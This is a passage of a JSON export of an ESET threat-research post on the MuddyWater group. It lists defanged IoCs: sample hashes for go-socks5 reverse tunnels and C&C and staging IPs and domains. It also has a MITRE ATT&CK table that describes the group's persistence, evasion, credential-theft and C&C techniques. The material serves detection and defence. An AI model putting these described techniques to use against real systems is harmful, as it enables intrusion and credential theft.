\u2013 go\u2011socks5 reverse tunnel.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>6CA41565844118385B34<wbr><\/wbr>5A39A9B79E0BBC0DD338<\/span><\/td>\n<td width=\"132\"><span>re<wbr><\/wbr>.exe<\/span><\/td>\n<td width=\"170\">WinGo\/TrojanProxy<wbr><\/wbr>.Agent.F<\/td>\n<td width=\"161\">MuddyWater \u2013 go\u2011socks5 reverse tunnel.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>6FC50A99AAE1D6C40111<wbr><\/wbr>632D4F49BD19F9794CF6<\/span><\/td>\n<td 
width=\"132\"><span>8525e604dfKuDNr<wbr><\/wbr>.exe<\/span><\/td>\n<td width=\"170\">WinGo\/TrojanProxy<wbr><\/wbr>.Agent.D<\/td>\n<td width=\"161\">MuddyWater \u2013 go\u2011socks5 reverse tunnel.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>826CFF5D85713CE4B2F3<wbr><\/wbr>C15AB53A84E6848D2E2C<\/span><\/td>\n<td width=\"132\"><span>bd34a33f5bJeJOf<wbr><\/wbr>.exe<\/span><\/td>\n<td width=\"170\">WinGo\/TrojanProxy<wbr><\/wbr>.Agent.D<\/td>\n<td width=\"161\">MuddyWater \u2013 go\u2011socks5 reverse tunnel.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>87ADD79C7C8335447113<wbr><\/wbr>EE0D413F52AE2B17F066<\/span><\/td>\n<td width=\"132\"><span>20d188afdcpfLFq<wbr><\/wbr>.exe<\/span><\/td>\n<td width=\"170\">WinGo\/TrojanProxy<wbr><\/wbr>.Agent.D<\/td>\n<td width=\"161\">MuddyWater \u2013 go\u2011socks5 reverse tunnel.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>93055115559219BE8441<wbr><\/wbr>880597C533381B99213B<\/span><\/td>\n<td width=\"132\"><span>main<wbr><\/wbr>.exe<\/span><\/td>\n<td width=\"170\">WinGo\/TrojanProxy<wbr><\/wbr>.Agent.D<\/td>\n<td width=\"161\">MuddyWater \u2013 go\u2011socks5 reverse tunnel.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>97C3376AB551E899F347<wbr><\/wbr>CC9DDF49EA01DB2D7903<\/span><\/td>\n<td width=\"132\"><span>504f53ca8esoLmG<wbr><\/wbr>.dll<\/span><\/td>\n<td width=\"170\">WinGo\/TrojanProxy<wbr><\/wbr>.Agent.D<\/td>\n<td width=\"161\">MuddyWater \u2013 go\u2011socks5 reverse tunnel.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>99FAD0862E2E8D363F3E<wbr><\/wbr>18952FD92E09493CC27D<\/span><\/td>\n<td width=\"132\"><span>20d188afdcpfLFq<wbr><\/wbr>.exe<\/span><\/td>\n<td width=\"170\">WinGo\/TrojanProxy<wbr><\/wbr>.Agent.D<\/td>\n<td width=\"161\">MuddyWater \u2013 go\u2011socks5 reverse tunnel.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>A101CBCCD950AA36FC3B<wbr><\/wbr>40C3C331FDE43ACDBBD2<\/span><\/td>\n<td width=\"132\"><span>66f3e097e4tnyHR<wbr><\/wbr>.exe<\/span><\/td>\n<td 
width=\"170\">WinGo\/TrojanProxy<wbr><\/wbr>.Agent.D<\/td>\n<td width=\"161\">MuddyWater \u2013 go\u2011socks5 reverse tunnel.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>A227C0A4425E24268B75<wbr><\/wbr>9A740231676A589CA4E6<\/span><\/td>\n<td width=\"132\"><span>fa54125dc8ZpaNJ<wbr><\/wbr>.exe<\/span><\/td>\n<td width=\"170\">WinGo\/TrojanProxy<wbr><\/wbr>.Agent.D<\/td>\n<td width=\"161\">MuddyWater \u2013 go\u2011socks5 reverse tunnel.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>A997A7AAE727D2C12CCE<wbr><\/wbr>80FE3607317775A4DF3E<\/span><\/td>\n<td width=\"132\"><span>fa54125dc8ZpaNJ<wbr><\/wbr>.exe<\/span><\/td>\n<td width=\"170\">WinGo\/TrojanProxy<wbr><\/wbr>.Agent.D<\/td>\n<td width=\"161\">MuddyWater \u2013 go\u2011socks5 reverse tunnel.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>B0271CA76052EC340014<wbr><\/wbr>D7BCCDBD69325A4E60F2<\/span><\/td>\n<td width=\"132\"><span>7295be2b1fAzMZI<wbr><\/wbr>.exe<\/span><\/td>\n<td width=\"170\">WinGo\/TrojanProxy<wbr><\/wbr>.Agent.D<\/td>\n<td width=\"161\">MuddyWater \u2013 go\u2011socks5 reverse tunnel.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>B0CD4F5DF192BFFE6500<wbr><\/wbr>E44B80C28505DFD9CA66<\/span><\/td>\n<td width=\"132\"><span>20d188afdcpfLFq<wbr><\/wbr>.exe<\/span><\/td>\n<td width=\"170\">WinGo\/TrojanProxy<wbr><\/wbr>.Agent.D<\/td>\n<td width=\"161\">MuddyWater \u2013 go\u2011socks5 reverse tunnel.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>B16E7D56A8DC0FF6B3AF<wbr><\/wbr>D797E1EAB22B20DFFB39<\/span><\/td>\n<td width=\"132\"><span>ESETGO<wbr><\/wbr>.exe<\/span><\/td>\n<td width=\"170\">WinGo\/TrojanProxy<wbr><\/wbr>.Agent.D<\/td>\n<td width=\"161\">MuddyWater \u2013 go\u2011socks5 reverse tunnel.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>D49979D0063B28BD7339<wbr><\/wbr>0481E6AE642C00CE0791<\/span><\/td>\n<td width=\"132\"><span>20d188afdcpfLFq<wbr><\/wbr>.exe<\/span><\/td>\n<td width=\"170\">WinGo\/TrojanProxy<wbr><\/wbr>.Agent.D<\/td>\n<td width=\"161\">MuddyWater \u2013 go\u2011socks5 reverse 
tunnel.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>D518F5C648AB64B390A2<wbr><\/wbr>9AA2858219318CFC556A<\/span><\/td>\n<td width=\"132\"><span>bd34a33f5bHOVby<wbr><\/wbr>.exe<\/span><\/td>\n<td width=\"170\">WinGo\/TrojanProxy<wbr><\/wbr>.Agent.D<\/td>\n<td width=\"161\">MuddyWater \u2013 go\u2011socks5 reverse tunnel.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>DF223D653F761ED55F9C<wbr><\/wbr>0774F1DBF545FD741F86<\/span><\/td>\n<td width=\"132\"><span>66f3e097e4tnyHR<wbr><\/wbr>.exe<\/span><\/td>\n<td width=\"170\">WinGo\/TrojanProxy<wbr><\/wbr>.Agent.D<\/td>\n<td width=\"161\">MuddyWater \u2013 go\u2011socks5 reverse tunnel.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>DF8FC5213AA11EE445EA<wbr><\/wbr>D1AAE17A826E7D51A743<\/span><\/td>\n<td width=\"132\"><span>Revoke.dll<\/span><\/td>\n<td width=\"170\">WinGo\/TrojanProxy<wbr><\/wbr>.Agent.D<\/td>\n<td width=\"161\">MuddyWater \u2013 go\u2011socks5 reverse tunnel.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>E02DD79A8CAED662969F<wbr><\/wbr>6D5D0792F2CB283116E8<\/span><\/td>\n<td width=\"132\"><span>66f3e097e4tnyHR<wbr><\/wbr>.exe<\/span><\/td>\n<td width=\"170\">WinGo\/TrojanProxy<wbr><\/wbr>.Agent.D<\/td>\n<td width=\"161\">MuddyWater \u2013 go\u2011socks5 reverse tunnel.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>E8F4EA3857EF5FDFEC1A<wbr><\/wbr>2063D707609251F207DB<\/span><\/td>\n<td width=\"132\"><span>main<wbr><\/wbr>.exe<\/span><\/td>\n<td width=\"170\">WinGo\/TrojanProxy<wbr><\/wbr>.Agent.D<\/td>\n<td width=\"161\">MuddyWater \u2013 go\u2011socks5 reverse tunnel.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>F26CAE9E79871DF3A47F<wbr><\/wbr>A61A755DC028C18451FC<\/span><\/td>\n<td width=\"132\"><span>7295be2b1fAzMZI<wbr><\/wbr>.exe<\/span><\/td>\n<td width=\"170\">WinGo\/TrojanProxy<wbr><\/wbr>.Agent.D<\/td>\n<td width=\"161\">MuddyWater \u2013 go\u2011socks5 reverse tunnel.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>FF09608790077E1BA52C<wbr><\/wbr>03D9390E0805189ADAD7<\/span><\/td>\n<td 
width=\"132\"><span>20d188afdcpfLFq<wbr><\/wbr>.exe<\/span><\/td>\n<td width=\"170\">WinGo\/TrojanProxy<wbr><\/wbr>.Agent.D<\/td>\n<td width=\"161\">MuddyWater \u2013 go\u2011socks5 reverse tunnel.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>A9747A3F58F8F408FECE<wbr><\/wbr>FC48DB0A18A1CB6DACAE<\/span><\/td>\n<td width=\"132\"><span>AppVs<wbr><\/wbr>.exe<\/span><\/td>\n<td width=\"170\">WinGo\/TrojanProxy<wbr><\/wbr>.Agent.D<\/td>\n<td width=\"161\">MuddyWater \u2013 go\u2011socks5 reverse tunnel.<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h3>Network<\/h3>\n<\/p>\n<table border=\"1\" cellpadding=\"0\" cellspacing=\"0\" width=\"642\">\n<thead>\n<tr>\n<td width=\"151\"><strong>IP<\/strong><\/td>\n<td width=\"104\"><strong>Domain<\/strong><\/td>\n<td width=\"142\"><strong>Hosting provider<\/strong><\/td>\n<td width=\"85\"><strong>First seen<\/strong><\/td>\n<td width=\"161\"><strong>Details<\/strong><\/td>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td width=\"151\"><span>3.95.7[.]142<\/span><\/td>\n<td width=\"104\">N\/A<\/td>\n<td width=\"142\">Amazon Data Services NoVa<\/td>\n<td width=\"85\">2024\u201109\u201108<\/td>\n<td width=\"161\">MuddyWater C&amp;C server.<\/td>\n<\/tr>\n<tr>\n<td width=\"151\"><span>35.175.224[.]64<\/span><\/td>\n<td width=\"104\">N\/A<\/td>\n<td width=\"142\">Amazon Technologies Inc.<\/td>\n<td width=\"85\">2024\u201110\u201110<\/td>\n<td width=\"161\">MuddyWater C&amp;C server.<\/td>\n<\/tr>\n<tr>\n<td width=\"151\"><span>51.16.209[.]105<\/span><\/td>\n<td width=\"104\"><span>api.tikavod<wbr><\/wbr>ot.co[.]il<\/span><\/td>\n<td width=\"142\">Amazon Data Services Ireland Technical Role Account<\/td>\n<td width=\"85\">2024\u201109\u201115<\/td>\n<td width=\"161\">MuddyWater C&amp;C server.<\/td>\n<\/tr>\n<tr>\n<td width=\"151\"><span>62.106.66[.]112<\/span><\/td>\n<td width=\"104\">N\/A<\/td>\n<td width=\"142\">RIPE-NCC-HM-MNT, ORG-NCC1-RIPE<\/td>\n<td width=\"85\">2024\u201109\u201129<\/td>\n<td width=\"161\">MuddyWater staging 
server.<\/td>\n<\/tr>\n<tr>\n<td width=\"151\"><span>157.20.182[.]45<\/span><\/td>\n<td width=\"104\">N\/A<\/td>\n<td width=\"142\">Hosterdaddy Private Limited<\/td>\n<td width=\"85\">2024\u201104\u201118<\/td>\n<td width=\"161\">MuddyWater staging server.<\/td>\n<\/tr>\n<tr>\n<td width=\"151\"><span>161.35.172[.]55<\/span><\/td>\n<td width=\"104\">N\/A <\/td>\n<td width=\"142\">DigitalOcean, LLC<\/td>\n<td width=\"85\">2022\u201111\u201112<\/td>\n<td width=\"161\">MuddyWater staging server.<\/td>\n<\/tr>\n<tr>\n<td width=\"151\"><span>167.99.224[.]13<\/span><\/td>\n<td width=\"104\"><span>magically<wbr><\/wbr>day[.]com<\/span><\/td>\n<td width=\"142\">DigitalOcean, LLC<\/td>\n<td width=\"85\">2022\u201111\u201106<\/td>\n<td width=\"161\">MuddyWater C&amp;C server.<\/td>\n<\/tr>\n<tr>\n<td width=\"151\"><span>194.11.246[.]78<\/span><\/td>\n<td width=\"104\">N\/A<\/td>\n<td width=\"142\">HosterDaddy Private Limited<\/td>\n<td width=\"85\">2024\u201107\u201123<\/td>\n<td width=\"161\">MuddyWater C&amp;C server.<\/td>\n<\/tr>\n<tr>\n<td width=\"151\"><span>194.11.246[.]101<\/span><\/td>\n<td width=\"104\"><span>processplan<wbr><\/wbr>et[.]org<\/span><\/td>\n<td width=\"142\">Administrator<\/td>\n<td width=\"85\">2024\u201108\u201127<\/td>\n<td width=\"161\">MuddyWater staging and C&amp;C server.<\/td>\n<\/tr>\n<tr>\n<td width=\"151\"><span>206.71.149[.]51<\/span><\/td>\n<td width=\"104\">N\/A<\/td>\n<td width=\"142\">BL Networks<\/td>\n<td width=\"85\">2023\u201110\u201130<\/td>\n<td width=\"161\">MuddyWater staging server.<\/td>\n<\/tr>\n<tr>\n<td width=\"151\"><span>212.232.22[.]136<\/span><\/td>\n<td width=\"104\">N\/A<\/td>\n<td width=\"142\">HosterDaddy Private Limited<\/td>\n<td width=\"85\">2025\u201101\u201116<\/td>\n<td width=\"161\">MuddyWater C&amp;C server.<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h2>MITRE ATT&amp;CK techniques<\/h2>\n<p>This table was built using <a href=\"https:\/\/attack.mitre.org\/resources\/versions\/\">version 17<\/a> of the MITRE 
ATT&amp;CK framework.<\/p>\n<\/p>\n<table border=\"1\" cellpadding=\"0\" cellspacing=\"0\">\n<thead>\n<tr>\n<td><strong>Tactic<\/strong><\/td>\n<td><strong>ID<\/strong><\/td>\n<td><strong>Name<\/strong><\/td>\n<td><strong>Description<\/strong><\/td>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td><strong>Reconnaissance<\/strong><\/td>\n<td><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1591\"><em>T1591<\/em><\/a><\/td>\n<td>Gather Victim Org Information<\/td>\n<td>MuddyWater gathers victim org info to use in spearphishing emails.<\/td>\n<\/tr>\n<tr>\n<td rowspan=\"4\"><strong>Resource Development<\/strong><\/td>\n<td><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1583\"><em>T1583<\/em><\/a><\/td>\n<td>Acquire Infrastructure<\/td>\n<td>MuddyWater uses acquired infrastructure to host malware download locations and C&amp;C servers.<\/td>\n<\/tr>\n<tr>\n<td><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1608\"><em>T1608<\/em><\/a><\/td>\n<td>Stage Capabilities<\/td>\n<td>MuddyWater stages tools like RMM tools and data stealers on file-hosting sites such as OneHub and Mega Limited.<\/td>\n<\/tr>\n<tr>\n<td><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1587\/001\"><em>T1587.001<\/em><\/a><\/td>\n<td>Develop Capabilities: Malware<\/td>\n<td>MuddyWater develops backdoors like MuddyViper and tools such as the Fooder loader, LP-Notes credential stealer, and the Blub and CE-Notes browser-data stealers.<\/td>\n<\/tr>\n<tr>\n<td><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1588\/002\"><em>T1588.002<\/em><\/a><\/td>\n<td>Obtain Capabilities: Tool<\/td>\n<td>MuddyWater uses publicly available tools from GitHub, such as <a href=\"https:\/\/github.com\/moonD4rk\/HackBrowserData\">HackBrowserData<\/a> and Go-based reverse proxies.<\/td>\n<\/tr>\n<tr>\n<td><strong>Initial Access<\/strong><\/td>\n<td><a 
href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1566\/002\"><em>T1566.002<\/em><\/a><\/td>\n<td>Phishing: Spearphishing Link<\/td>\n<td>MuddyWater uses spearphishing emails with links to file hosting sites like OneHub and Mega Limited to host RMM software (Atera, Level, and PDQ).<\/td>\n<\/tr>\n<tr>\n<td rowspan=\"5\"><strong>Execution<\/strong><\/td>\n<td><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1059\/001\"><em>T1059.001<\/em><\/a><\/td>\n<td>Command and Scripting Interpreter: PowerShell<\/td>\n<td>MuddyViper has the capability to open and execute PowerShell scripts.<\/td>\n<\/tr>\n<tr>\n<td><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1059\/003\"><em>T1059.003<\/em><\/a><\/td>\n<td>Command and Scripting Interpreter: Windows Command Shell<\/td>\n<td>MuddyViper has the capability to offer the Windows Command shell as a reverse shell.<\/td>\n<\/tr>\n<tr>\n<td><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1559\/001\"><em>T1559.001<\/em><\/a><\/td>\n<td>Inter-Process Communication: Component Object Model<\/td>\n<td>MuddyViper uses the <span>ITaskService<\/span> COM object to create a scheduled task for persistence.<\/td>\n<\/tr>\n<tr>\n<td><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1106\"><em>T1106<\/em><\/a><\/td>\n<td>Native API<\/td>\n<td>MuddyViper uses the <span>CreateProcess<\/span> API to execute additional files and commands.<\/td>\n<\/tr>\n<tr>\n<td><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1204\/001\"><em>T1204.001<\/em><\/a><\/td>\n<td>User Execution: Malicious Link<\/td>\n<td>MuddyWater operators rely on targets clicking malicious links delivered through spearphishing.<\/td>\n<\/tr>\n<tr>\n<td rowspan=\"3\"><strong>Persistence<\/strong><\/td>\n<td><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1547\/001\"><em>T1547.001<\/em><\/a><\/td>\n<td>Boot or Logon Autostart Execution: Registry Run Keys \/ Startup Folder<\/td>\n<td>MuddyViper 
has the capability to copy itself to the victim\u2019s Startup folder.<\/td>\n<\/tr>\n<tr>\n<td><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1543\/003\"><em>T1543.003<\/em><\/a><\/td>\n<td>Create or Modify System Process: Windows Service<\/td>\n<td>MuddyWater operators attempt to install RMM tools in <span>%PROGRAMFILES%<\/span>, which also includes creating a Windows service set to autostart.<\/td>\n<\/tr>\n<tr>\n<td><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1053\"><em>T1053<\/em><\/a><\/td>\n<td>Scheduled Task\/Job<\/td>\n<td>MuddyViper can be persisted as a scheduled task named <span>ManageOnDriveUpdater<\/span>.<\/td>\n<\/tr>\n<tr>\n<td rowspan=\"14\"><strong>Defense Evasion<\/strong><\/td>\n<td><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1134\/001\"><em>T1134.001<\/em><\/a><\/td>\n<td>Access Token Manipulation: Token Impersonation\/Theft<\/td>\n<td>The LP-Notes and CE-Notes tools attempt to impersonate a logged-on user\u2019s security context via <span>ImpersonateLoggedOnUser<\/span>.<\/td>\n<\/tr>\n<tr>\n<td><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1140\"><em>T1140<\/em><\/a>\n<\/td>\n<td>Deobfuscate\/Decode Files or Information<\/td>\n<td>Blub uses string obfuscation for storing stolen data.<br \/>Fooder can extract embedded, AES-encrypted payloads.<br \/>CE-Notes and LP-Notes both use a custom byte-wise decryption routine to decrypt strings.<\/td>\n<\/tr>\n<tr>\n<td><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1620\"><em>T1620<\/em><\/a><\/td>\n<td>Reflective Code Loading<\/td>\n<td>The Fooder loader performs reflective code loading to run additional tools (MuddyViper, reverse tunnels, and HackBrowserData).<\/td>\n<\/tr>\n<tr>\n<td><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1497\/003\"><em>T1497.003<\/em><\/a><\/td>\n<td>Virtualization\/Sandbox Evasion: Time Based Evasion<\/td>\n<td>MuddyViper uses many calls to a sleep function to 
detect and avoid virtualization and analysis environments, and generally to inhibit dynamic analysis.<\/td>\n<\/tr>\n<tr>\n<td><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1027\/007\"><em>T1027.007<\/em><\/a><\/td>\n<td>Obfuscated Files or Information: Dynamic API Resolution<\/td>\n<td>CE-Notes and LP-Notes perform dynamic API resolution by decrypting strings at runtime.<\/td>\n<\/tr>\n<tr>\n<td><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1134\/002\"><em>T1134.002<\/em><\/a><\/td>\n<td>Access Token Manipulation: Create Process with Token <\/td>\n<td>Fooder\u2019s launcher attempts to duplicate the token of a process specified by the operator when launching Fooder via <span>CreateProcessAsUserA<\/span>.<\/td>\n<\/tr>\n<tr>\n<td><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1622\"><em>T1622<\/em><\/a><\/td>\n<td>Debugger Evasion <\/td>\n<td>MuddyViper searches for specific debugging tools, adjusting its behavior accordingly.<\/td>\n<\/tr>\n<tr>\n<td><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1070\/009\"><em>T1070.009<\/em><\/a><\/td>\n<td>Indicator Removal: Clear Persistence<\/td>\n<td>MuddyViper can modify registry keys used for persistence, if instructed to uninstall itself.<\/td>\n<\/tr>\n<tr>\n<td><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1070\/004\"><em>T1070.004<\/em><\/a><\/td>\n<td>Indicator Removal: File Deletion<\/td>\n<td>MuddyViper can delete itself from the system, if instructed to uninstall itself.<\/td>\n<\/tr>\n<tr>\n<td><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1036\"><em>T1036<\/em><\/a><\/td>\n<td>Masquerading<\/td>\n<td>Some versions of Fooder masquerade as an innocuous Snake game.<\/td>\n<\/tr>\n<tr>\n<td><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1036\/004\"><em>T1036.004<\/em><\/a><\/td>\n<td>Masquerading: Masquerade Task or Service<\/td>\n<td>MuddyViper can create a task named 
<span>ManageOnDriveUpdater<\/span>.<\/td>\n<\/tr>\n<tr>\n<td><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1112\"><em>T1112<\/em><\/a><\/td>\n<td>Modify Registry<\/td>\n<td>MuddyViper can modify the <span>HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\<wbr><\/wbr>Explorer\\User Shell Folders\\Startup<\/span> and <span>HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\<wbr><\/wbr>Explorer\\Shell Folders\\Startup<\/span> registry values, redirecting the Startup folder to a different location.<\/td>\n<\/tr>\n<tr>\n<td><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1027\/009\"><em>T1027.009<\/em><\/a><\/td>\n<td>Obfuscated Files or Information: Embedded Payloads<\/td>\n<td>Fooder can extract an embedded, AES-encrypted payload.<\/td>\n<\/tr>\n<tr>\n<td><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1027\/013\"><em>T1027.013<\/em><\/a><\/td>\n<td>Obfuscated Files or Information: Encrypted\/Encoded File<\/td>\n<td>Fooder can extract an embedded, AES-encrypted payload.<\/td>\n<\/tr>\n<tr>\n<td rowspan=\"2\"><strong>Credential Access<\/strong><\/td>\n<td><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1555\/003\"><em>T1555.003<\/em><\/a><\/td>\n<td>Credentials from Password Stores: Credentials from Web Browsers<\/td>\n<td>CE-Notes and Blub attempt to steal credentials stored in browsers.<\/td>\n<\/tr>\n<tr>\n<td><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1056\/002\"><em>T1056.002<\/em><\/a>\n<\/td>\n<td>Input Capture: GUI Input Capture<\/td>\n<td>MuddyViper and LP-Notes have the ability to display a Windows security login prompt to capture login credentials and confirm the credentials\u2019 veracity by relaying those credentials to legitimate Windows APIs.<\/td>\n<\/tr>\n<tr>\n<td rowspan=\"2\"><strong>Discovery<\/strong><\/td>\n<td><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1082\"><em>T1082<\/em><\/a>\n<\/td>\n<td>System Information Discovery<\/td>\n<td>MuddyViper collects system 
information from compromised systems and reports it back to the C&amp;C server.<\/td>\n<\/tr>\n<tr>\n<td><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1518\/001\"><em>T1518.001<\/em><\/a><\/td>\n<td>Software Discovery: Security Software Discovery<\/td>\n<td>MuddyViper enumerates running processes, looks for security-related ones and, if found, reports them to the C&amp;C server and modifies its behavior.<\/td>\n<\/tr>\n<tr>\n<td rowspan=\"2\"><strong>Collection<\/strong><\/td>\n<td><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1074\/001\"><em>T1074.001<\/em><\/a><\/td>\n<td>Data Staged: Local Data Staging<\/td>\n<td>Blub, CE-Notes, and LP-Notes stage stolen credentials on disk for MuddyViper, reverse tunnels, or RMM tools to collect and exfiltrate.<\/td>\n<\/tr>\n<tr>\n<td><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1560\/001\"><em>T1560.001<\/em><\/a>\n<\/td>\n<td>Archive Collected Data: Archive via Utility<\/td>\n<td>MuddyViper uses PowerShell\u2019s <span>Compress-Archive<\/span> command to compress browser data collected via the HackBrowserData utility.<\/td>\n<\/tr>\n<tr>\n<td rowspan=\"6\"><strong>Command and Control<\/strong><\/td>\n<td><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1573\/001\"><em>T1573.001<\/em><\/a><\/td>\n<td>Encrypted Channel: Symmetric Cryptography<\/td>\n<td>MuddyViper uses AES-CBC to encrypt data before exchanging it with the C&amp;C server.<\/td>\n<\/tr>\n<tr>\n<td><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1219\"><em>T1219<\/em><\/a><\/td>\n<td>Remote Access Software<\/td>\n<td>MuddyWater uses the Atera, Level, and PDQ RMM tools for remote access to victims\u2019 systems.<\/td>\n<\/tr>\n<tr>\n<td><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1071\/001\"><em>T1071.001<\/em><\/a><\/td>\n<td>Application Layer Protocol: Web Protocols<\/td>\n<td>MuddyViper uses HTTPS for 
C&amp;C communications. The reverse tunnels use a mixture of HTTP and HTTPS for C&amp;C communications.<\/td>\n<\/tr>\n<tr>\n<td><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1105\"><em>T1105<\/em><\/a><\/td>\n<td>Ingress Tool Transfer<\/td>\n<td>MuddyViper has the capability to download additional payloads from its C&amp;C server.<\/td>\n<\/tr>\n<tr>\n<td><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1001\"><em>T1001<\/em><\/a><\/td>\n<td>Data Obfuscation<\/td>\n<td>MuddyViper leverages HTTPS for C&amp;C communications, using the <span>Status<\/span> header to hide a backdoor command ID in the server-to-client direction of the communication.<\/td>\n<\/tr>\n<tr>\n<td><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1090\"><em>T1090<\/em><\/a><\/td>\n<td>Proxy<\/td>\n<td>MuddyWater uses customized versions of go\u2011socks5 reverse proxy tools.<\/td>\n<\/tr>\n<tr>\n<td rowspan=\"2\"><strong>Exfiltration<\/strong><\/td>\n<td><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1041\"><em>T1041<\/em><\/a><\/td>\n<td>Exfiltration Over C2 Channel<\/td>\n<td>MuddyWater tools exfiltrate data to C&amp;C servers over the existing C&amp;C channels (HTTP and HTTPS).<\/td>\n<\/tr>\n<tr>\n<td><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1030\"><em>T1030<\/em><\/a><\/td>\n<td>Data Transfer Size Limits<\/td>\n<td>MuddyViper supports downloading\/uploading files in chunks of limited size.<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><a href=\"https:\/\/www.eset.com\/int\/business\/services\/threat-intelligence\/?utm_source=welivesecurity.com&amp;utm_medium=referral&amp;utm_campaign=wls-research&amp;utm_content=muddywater-snakes-riverbank&amp;sfdccampaignid=7011n0000017htTAAQ\"><img loading=\"lazy\" decoding=\"async\" alt=\"\" height=\"296\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/eti-eset-threat-intelligence.png\" width=\"915\"><\/a><\/p>\n<p class=\"wls-source\"><a 
href=\"https:\/\/www.welivesecurity.com\/en\/eset-research\/muddywater-snakes-riverbank\/\" rel=\"nofollow noopener\" target=\"_blank\">Read the full analysis on WeLiveSecurity \u2192<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>MuddyWater targets critical infrastructure in Israel and Egypt, relying on custom malware, improved tactics, and a predictable playbook<\/p>\n","protected":false},"author":5,"featured_media":9054,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"footnotes":""},"categories":[2878],"tags":[],"class_list":["post-9053","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-eset-research"],"acf":[],"amp_enabled":true,"_links":{"self":[{"href":"https:\/\/blog.eset.ee\/et\/en\/wp-json\/wp\/v2\/posts\/9053","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.eset.ee\/et\/en\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.eset.ee\/et\/en\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.eset.ee\/et\/en\/wp-json\/wp\/v2\/users\/5"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.eset.ee\/et\/en\/wp-json\/wp\/v2\/comments?post=9053"}],"version-history":[{"count":1,"href":"https:\/\/blog.eset.ee\/et\/en\/wp-json\/wp\/v2\/posts\/9053\/revisions"}],"predecessor-version":[{"id":9816,"href":"https:\/\/blog.eset.ee\/et\/en\/wp-json\/wp\/v